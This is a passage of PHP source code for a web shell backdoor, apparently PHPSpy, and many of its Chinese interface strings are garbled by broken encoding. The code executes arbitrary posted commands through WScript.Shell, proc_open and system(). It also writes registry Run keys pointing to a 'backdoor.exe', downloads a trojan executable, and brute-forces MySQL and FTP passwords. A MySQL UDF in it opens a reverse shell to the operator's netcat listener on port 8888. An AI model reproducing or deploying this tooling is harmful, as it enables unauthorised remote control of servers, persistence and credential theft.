} elseif ($execfunc=="wscript") {
|
|||
|
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
|
|||
|
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
|
|||
|
$stdout = $exec->StdOut();
|
|||
|
$stroutput = $stdout->ReadAll();
|
|||
|
echo $stroutput;
|
|||
|
} elseif($execfunc=="proc_open"){
|
|||
|
$descriptorspec = array(
|
|||
|
0 => array("pipe", "r"),
|
|||
|
1 => array("pipe", "w"),
|
|||
|
2 => array("pipe", "w")
|
|||
|
);
|
|||
|
$process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes);
|
|||
|
if (is_resource($process)) {
|
|||
|
|
|||
|
// д<><D0B4><EFBFBD><EFBFBD>
|
|||
|
fwrite($pipes[0], "".$_POST['command']."\r\n");
|
|||
|
fwrite($pipes[0], "exit\r\n");
|
|||
|
fclose($pipes[0]);
|
|||
|
// <20><>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD>
|
|||
|
while (!feof($pipes[1])) {
|
|||
|
echo fgets($pipes[1], 1024);
|
|||
|
}
|
|||
|
fclose($pipes[1]);
|
|||
|
while (!feof($pipes[2])) {
|
|||
|
echo fgets($pipes[2], 1024);
|
|||
|
}
|
|||
|
fclose($pipes[2]);
|
|||
|
|
|||
|
proc_close($process);
|
|||
|
}
|
|||
|
} else {
|
|||
|
system($_POST['command']);
|
|||
|
}
|
|||
|
}
|
|||
|
?></textarea></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<?php
|
|||
|
}//end shell
|
|||
|
|
|||
|
elseif ($_GET['action'] == "reg") {
|
|||
|
$action = '?action=reg';
|
|||
|
$regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
|
|||
|
$registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
|
|||
|
$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
|
|||
|
$delregname = $_POST['delregname'];
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><>ȡע<C8A1><D7A2><EFBFBD><EFBFBD>');
|
|||
|
$tb->tdbody('<27><>ֵ: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','<27><>ȡ','','submit'),'center','2','50');
|
|||
|
echo "</form>";
|
|||
|
|
|||
|
$tb->formheader($action,'д<><D0B4>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>');
|
|||
|
$cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
|
|||
|
$tb->tdbody('<27><>ֵ: '.$tb->makeinput('writeregname',$registre,'','text','56').' <20><><EFBFBD><EFBFBD>: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' ֵ: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','д<><D0B4>','','submit'),'center','2','50');
|
|||
|
echo "</form>";
|
|||
|
|
|||
|
$tb->formheader($action,'ɾ<><C9BE>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>');
|
|||
|
$tb->tdbody('<27><>ֵ: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','ɾ<><C9BE>','','submit'),'center','2','50');
|
|||
|
echo "</form>";
|
|||
|
$tb->tablefooter();
|
|||
|
}//end reg
|
|||
|
elseif ($_GET['action'] == "downloads"){
|
|||
|
$action = '?action=dir';
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'http<74>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ģʽ');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD>ܰ<EFBFBD>һЩС<D0A9><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>http<74><70>ʽ<EFBFBD><CABD><EFBFBD>ص<EFBFBD><D8B5>˷<EFBFBD><CBB7><EFBFBD><EFBFBD><EFBFBD>','center');
|
|||
|
$tb->tdbody('<27>ļ<EFBFBD>λ<EFBFBD><CEBB>: '.$tb->makeinput('durl','http://google.com/muma.exe','','text','70').'<br><3E><><EFBFBD>ص<EFBFBD>:'.$tb->makeinput('path','./muma.exe','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','<27><><EFBFBD><EFBFBD>','','submit'),'center','1','35');
|
|||
|
echo "</form>";
|
|||
|
$tb->tdbody('ע<><D7A2>,<2C><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>̫<EFBFBD><CCAB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><DEB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ӱ<EFBFBD><D3B0>ִ<EFBFBD><D6B4><EFBFBD>ٶ<EFBFBD>.','center');
|
|||
|
$tb->tablefooter();
|
|||
|
}
|
|||
|
elseif ($_GET['action'] == "mix"){
|
|||
|
$action = '?action=dir';
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><>ѹ<EFBFBD><D1B9>mix.dll<6C>ļ<EFBFBD>');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD>phpspy<70><79><EFBFBD><EFBFBD>mix.dll<6C><6C>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>','center');
|
|||
|
$tb->tdbody('<27><>ѹ<EFBFBD><D1B9>Ϊ: '.$tb->makeinput('mixto','./mix.dll','','text','70').''.$tb->makehidden('action','mix').''.$tb->makeinput('','unzip','','submit'),'center','1','35');
|
|||
|
echo "</form>";
|
|||
|
$tb->tablefooter();
|
|||
|
}
|
|||
|
elseif ($_GET['action'] == "crack"){
|
|||
|
$action = '?action=dir';
|
|||
|
$tb->tableheader();
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD>ͻ<EFBFBD><CDBB>һЩ<D2BB>ر<EFBFBD><D8B1>ĵط<C4B5><D8B7><EFBFBD><EFBFBD><D7BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>','center');
|
|||
|
if($type=="crack"){
|
|||
|
$tb->formheader($action,'<27><><EFBFBD><EFBFBD><EFBFBD>ƽ<EFBFBD>mysql<71><6C>ftp<74><70><EFBFBD><EFBFBD> <a href="?action=crack">[Mysql<71><6C><EFBFBD><EFBFBD>]</a>');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һЩ<D2BB><D0A9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>mysql<71><6C>½<EFBFBD><C2BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƽ⡣','center');
|
|||
|
$tb->tdbody('host: '.$tb->makeinput('host','localhost','','text','12').' <73>ʺ<EFBFBD>'.$tb->makeinput('user','root','','text','12').''.$tb->makehidden('do','crack').' <3B>ֵ<EFBFBD>:'.$tb->makeinput('passfile','./password.txt','','text','20').' һ<><D2BB><EFBFBD><EFBFBD>̽:'.$tb->makeinput('onetime','100','','text','6').'<27><> '.$tb->makeinput('','crack','','submit'),'center','1','35');
|
|||
|
$tb->tdbody('MYSQL:<input type="radio" name="ctype" value="mysql" checked> Ftp:<input type="radio" name="ctype" value="ftp">','center');
|
|||
|
echo "</form>";
|
|||
|
if(getphpcfg("allow_url_fopen")=="Yes") $temp = "<22><>Զ<EFBFBD><D4B6><EFBFBD>ļ<EFBFBD>";
|
|||
|
$tb->tdbody('<27>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9><EFBFBD><EFBFBD><EFBFBD>Ի<EFBFBD><D4BB><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>'.$temp.'<27><>Ftp<74><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƽ<EFBFBD><C6BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ѿ<EFBFBD>ͨ<EFBFBD><CDA8><EFBFBD><EFBFBD>','center');
|
|||
|
$tb->formheader($action,'<27>˿<EFBFBD>ɨ<EFBFBD><C9A8>');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Խ<EFBFBD><D4BD>ж˿ڵļ<DAB5><C4BC><EFBFBD>ɨ<EFBFBD>衣','center');
|
|||
|
$tb->tdbody('host: '.$tb->makeinput('host','127.0.0.1',''.$tb->makehidden('do','port').'','text','12').' <3B>˿ڱ<CBBF>:'.$tb->makeinput('port',''.$admin[port].'','','text','60').'','center','1','35');
|
|||
|
$tb->tdbody(''.$tb->makeinput('','<27><><EFBFBD>ж˿<D0B6>ɨ<EFBFBD><C9A8>','','submit').'','center');
|
|||
|
echo "</form>";
|
|||
|
$tb->tdbody('<27>˿ڱ<CBBF><DAB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD>Ķ˿<C4B6><CBBF>ö<EFBFBD><C3B6>Ÿ<EFBFBD><C5B8><EFBFBD>!','center');
|
|||
|
$tb->tableheader();
|
|||
|
}else{
|
|||
|
$tb->formheader("".$action."\" enctype=\"multipart/form-data",'ʹ<><CAB9>Mysql<71>ϴ<EFBFBD><CFB4>ļ<EFBFBD> <a href="?action=crack&type=crack">[Crack<63><6B><EFBFBD><EFBFBD>]</a>');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD>ʺŰ<CABA><C5B0>ļ<EFBFBD><C4BC><EFBFBD>mysql<71><6C>Ȩ<EFBFBD><EFBFBD><DEB5><EFBFBD>WebshellȨ<6C>ޱ<EFBFBD><DEB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD>ĵط<C4B5>','center');
|
|||
|
$tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').'db: '.$tb->makeinput('database','mysql.user','','text','16').'upto: '.$tb->makeinput('uppath','c:/','','text','16').''.$tb->makehidden('action','mysqlup'),'center','1','35');
|
|||
|
$tb->tdbody('<27>ϴ<EFBFBD><CFB4><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>: '.$tb->makeinput('upname','','','text','16').'ѡ<><D1A1><EFBFBD>ļ<EFBFBD>: '.$tb->makeinput('upfile','','','file','26').''.$tb->makeinput('','upload','','submit'),'center','1','35');
|
|||
|
echo "</form>";
|
|||
|
$tb->tdbody('ò<><C3B2>ֻҪ<D6BB><D2AA>fileȨ<65><EFBFBD><DEB5>ʺžͿ<C5BE><CDBF><EFBFBD><EFBFBD><EFBFBD>,<2C><>д<EFBFBD>ϴ<EFBFBD><CFB4><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>Ϊԭ<CEAA><D4AD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>.','center');
|
|||
|
$tb->formheader($action,'<27><><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD>ʺ<EFBFBD><CABA><EFBFBD><EFBFBD><EFBFBD>Webshell<6C><6C><EFBFBD>ܶ<EFBFBD>ȡ<EFBFBD><C8A1><EFBFBD>ص<EFBFBD><D8B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD> <20><><EFBFBD><EFBFBD>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD> <input type="checkbox" name="rardown" value="yes" onclick="javascript:alert(\'ʹ<>ô˹<C3B4><CBB9>ܵ<EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD>RARѹ<52><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>!\')"> ','center');
|
|||
|
$tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').''.$tb->makehidden('action','mysqldown').'<27>ļ<EFBFBD>: '.$tb->makeinput('filename','C:/windows/php.ini','','text','26').''.$tb->makeinput('','download','','submit'),'center','1','35');
|
|||
|
echo "</form>";
|
|||
|
$tb->tdbody('ò<><C3B2>ֻҪ<D6BB><D2AA>fileȨ<65><EFBFBD><DEB5>ʺžͿ<C5BE><CDBF><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD>ٿ<EFBFBD><D9BF>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD>ھ<EFBFBD><DABE><EFBFBD>.','center');
|
|||
|
$tb->tdbody('WindowsĬ<73><C4AC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>MysqlΪSystemȨ<6D>ޣ<EFBFBD><DEA3><EFBFBD>Linuxϵͳ<CFB5><CDB3>Ȩ<EFBFBD><EFBFBD><DEB2>ߡ<EFBFBD>.','center');
|
|||
|
}
|
|||
|
$tb->tablefooter();
|
|||
|
}
|
|||
|
elseif ($_GET['action'] == "search"){
|
|||
|
$action = '?dir='.$dir.'';
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD>ܲ<EFBFBD><DCB2><EFBFBD>һ<EFBFBD><D2BB>Ŀ¼<C4BF>µ<EFBFBD><C2B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Źؼ<C5B9><D8BC><EFBFBD>!','center');
|
|||
|
$tb->tdbody('<27>ļ<EFBFBD>λ<EFBFBD><CEBB>: '.$tb->makeinput('path',''.$nowpath.'','','text','70').'<br><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:'.$tb->makeinput('oldkey','<27>¼<EFBFBD>','','text','60').''.$tb->makehidden('do','search').'<br> <20>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><input type="checkbox" name="type" value="list" onclick="javascript:alert(\'ѡ<><D1A1><EFBFBD>˴<EFBFBD><CBB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>г<EFBFBD><D0B3>ؼ<EFBFBD><D8BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC>Ķ<EFBFBD><C4B6><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD><DAB5><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC>ж<EFBFBD><D0B6><EFBFBD><EFBFBD>н<EFBFBD><D0BD>бȶ<D0B1>\\n\\n<><6E>ʽΪ:[<5B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>]<5D><><EFBFBD><EFBFBD>[12/99],<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>з<EFBFBD><D0B7><EFBFBD>.\\n\\n<>˹<EFBFBD><CBB9>ܿ<EFBFBD><DCBF>ܻ<EFBFBD><DCBB><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD>ֵ<EFBFBD><D6B5><EFBFBD>ʱ,<2C>뿼<EFBFBD><EBBFBC>ʹ<EFBFBD><CAB9>,û<>пɶ<D0BF>Ȩ<EFBFBD><EFBFBD><DEBD><EFBFBD><EFBFBD><EFBFBD>!\')"> (<28>˹<EFBFBD><CBB9>ܺ<EFBFBD><DCBA><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD>ܻ<EFBFBD>Ӱ<EFBFBD><D3B0>ִ<EFBFBD><D6B4><EFBFBD>ٶȣ<D9B6><C8A3><EFBFBD><EFBFBD><EFBFBD>Ĭ<EFBFBD>Ϲر<CFB9>!) <br><3E>ʵ<EFBFBD><CAB5><EFBFBD>ȡ:<input type="checkbox" name="type2" value="getpath" onclick="javascript:alert(\'ѡ<><D1A1><EFBFBD>˴<EFBFBD><CBB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>г<EFBFBD><D0B3>ؼ<EFBFBD><D8BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>λ<EFBFBD>ü<EFBFBD><C3BC><EFBFBD><EFBFBD>趨<EFBFBD><E8B6A8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڵIJ<DAB5><C4B2><EFBFBD><EFBFBD>ַ<EFBFBD>..\\n\\n<><6E>ȡ<EFBFBD>˹<EFBFBD><CBB9>ܲ<EFBFBD><DCB2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƶ<EFBFBD><C6B6><EFBFBD><EFBFBD>ҵ<EFBFBD><D2B5><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>ϼ<EFBFBD><CFBC>ɶ<EFBFBD>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD>....\\n\\n<>˹<EFBFBD><CBB9>ܿ<EFBFBD><DCBF>ܻ<EFBFBD><DCBB><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD>ֵ<EFBFBD><D6B5><EFBFBD>ʱ,<2C>뿼<EFBFBD><EBBFBC>ʹ<EFBFBD><CAB9>,û<>пɶ<D0BF>Ȩ<EFBFBD><EFBFBD><DEBD><EFBFBD><EFBFBD><EFBFBD>!\')"> <20><>ȡ<EFBFBD>ؼ<EFBFBD><D8BC><EFBFBD>ǰ'.$tb->makeinput('beline','0','','text','3').'<27><><EFBFBD>ַ<EFBFBD> '.$tb->makehidden('dir',''.$dir.'').'<27><><EFBFBD>ؼ<EFBFBD><D8BC>ʺ<EFBFBD><CABA><EFBFBD>'.$tb->makeinput('endline','10','','text','3').'<27><><EFBFBD>ַ<EFBFBD>... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','<27><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>','','submit'),'center','1','35');
|
|||
|
echo "</form>";
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD>̫<EFBFBD><CCAB><EFBFBD><EFBFBD>Ŀ¼<C4BF>ˣ<EFBFBD><CBA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Һò<D2BA><C3B2><EFBFBD><EFBFBD><EFBFBD>.<2E><><EFBFBD><EFBFBD>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ٶȻ<D9B6><C8BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ[<5B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F>ܹ<EFBFBD><DCB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>]','center');
|
|||
|
$tb->tablefooter();
|
|||
|
}
|
|||
|
elseif ($_GET['action'] == "proxy") {
|
|||
|
$action = '?action=proxy';
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><><EFBFBD>ߴ<EFBFBD><DFB4><EFBFBD>','proxyframe');
|
|||
|
$tb->tdbody('<br><ul><li><3E>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD>ܽ<EFBFBD>ʵ<EFBFBD>ּ<D6BC> HTTP <20><><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾʹ<CABE><CAB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD>ͼƬ<CDBC><C6AC><EFBFBD><EFBFBD><EFBFBD>Ӽ<EFBFBD>CSS<53><53>ʽ<EFBFBD><CABD>.</li><li><3E>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD>ܿ<EFBFBD><DCBF><EFBFBD>ͨ<EFBFBD><CDA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF>URL,<2C><><EFBFBD><EFBFBD>֧<EFBFBD><D6A7> SQL Injection ̽<><CCBD><EFBFBD>Լ<EFBFBD>ijЩ<C4B3><D0A9><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD>.</li><li><3E>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> URL,<2C><>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>µ<EFBFBD>IP<49><50>¼<EFBFBD><C2BC> : '.gethostbyname($_SERVER['SERVER_NAME']).'</li></ul>','left');
|
|||
|
$tb->tdbody('URL: '.$tb->makeinput('url','about:blank','','text','100').' '.$tb->makeinput('','<27><><EFBFBD><EFBFBD>','','submit'),'center','1','40');
|
|||
|
$tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe>');
|
|||
|
echo "</form>";
|
|||
|
$tb->tablefooter();
|
|||
|
}//end proxy
|
|||
|
|
|||
|
elseif ($_GET['action'] == "sql") {
|
|||
|
$action = '?action=sql';
|
|||
|
|
|||
|
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
|
|||
|
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
|
|||
|
$dbpassword = $_POST['dbpassword'];
|
|||
|
$dbname = $_POST['dbname'];
|
|||
|
$sql_query = $_POST['sql_query'];
|
|||
|
if($type=="fun"){
|
|||
|
$sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\\Winnt\\\Mix.dll';
|
|||
|
select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/*<2A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>*/
|
|||
|
/*<2A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4> nc -vv -l -p 8888*/";
|
|||
|
}
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'ִ<><D6B4> SQL <20><><EFBFBD><EFBFBD>');
|
|||
|
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','<27><><EFBFBD><EFBFBD>','','submit'));
|
|||
|
$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
|
|||
|
$tb->makehidden('do','query');
|
|||
|
$tb->formfooter('1','30');
|
|||
|
}//end sql query
|
|||
|
|
|||
|
elseif ($_GET['action'] == "sqlbak") {
|
|||
|
$action = '?action=sqlbak';
|
|||
|
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
|
|||
|
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
|
|||
|
$dbpassword = $_POST['dbpassword'];
|
|||
|
$dbname = $_POST['dbname'];
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><><EFBFBD><EFBFBD> MySQL <20><><EFBFBD>ݿ<EFBFBD>');
|
|||
|
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','<27><><EFBFBD><EFBFBD>','','submit'));
|
|||
|
@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
|
|||
|
$tables = @mysql_list_tables($dbname);
|
|||
|
while ($table = @mysql_fetch_row($tables)) {
|
|||
|
$cachetables[$table[0]] = $table[0];
|
|||
|
}
|
|||
|
@mysql_free_result($tables);
|
|||
|
if (empty($cachetables)) {
|
|||
|
$tb->tdbody('<b><3E><>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD> or <20><>ǰ<EFBFBD><C7B0><EFBFBD>ݿ<EFBFBD>û<EFBFBD><C3BB><EFBFBD>κ<EFBFBD><CEBA><EFBFBD><EFBFBD>ݱ<EFBFBD></b>');
|
|||
|
} else {
|
|||
|
$tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top"><3E><>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD>:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> ֱ<><D6B1><EFBFBD><EFBFBD><EFBFBD>ص<EFBFBD><D8B5><EFBFBD><EFBFBD><EFBFBD> (<28>ʺ<EFBFBD><CABA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С<EFBFBD><D0A1><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>)</td></tr></table>');
|
|||
|
$tb->makehidden('do','backupmysql');
|
|||
|
$tb->formfooter('0','30');
|
|||
|
}
|
|||
|
$tb->tablefooter();
|
|||
|
@mysql_close();
|
|||
|
}//end sql backup
|
|||
|
|
|||
|
elseif ($_GET['action'] == "phpenv") {
|
|||
|
$user = " <a href=\"?action=nowuser\" target=\"_blank\"><3E><><EFBFBD><EFBFBD>crush<73><68><EFBFBD>˻<EFBFBD>ȡ<EFBFBD><C8A1>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD></a> ";
|
|||
|
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD>";
|
|||
|
$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
|
|||
|
if ($dis_func == "") {
|
|||
|
$dis_func = "No";
|
|||
|
}else {
|
|||
|
$dis_func = str_replace(" ","<br>",$dis_func);
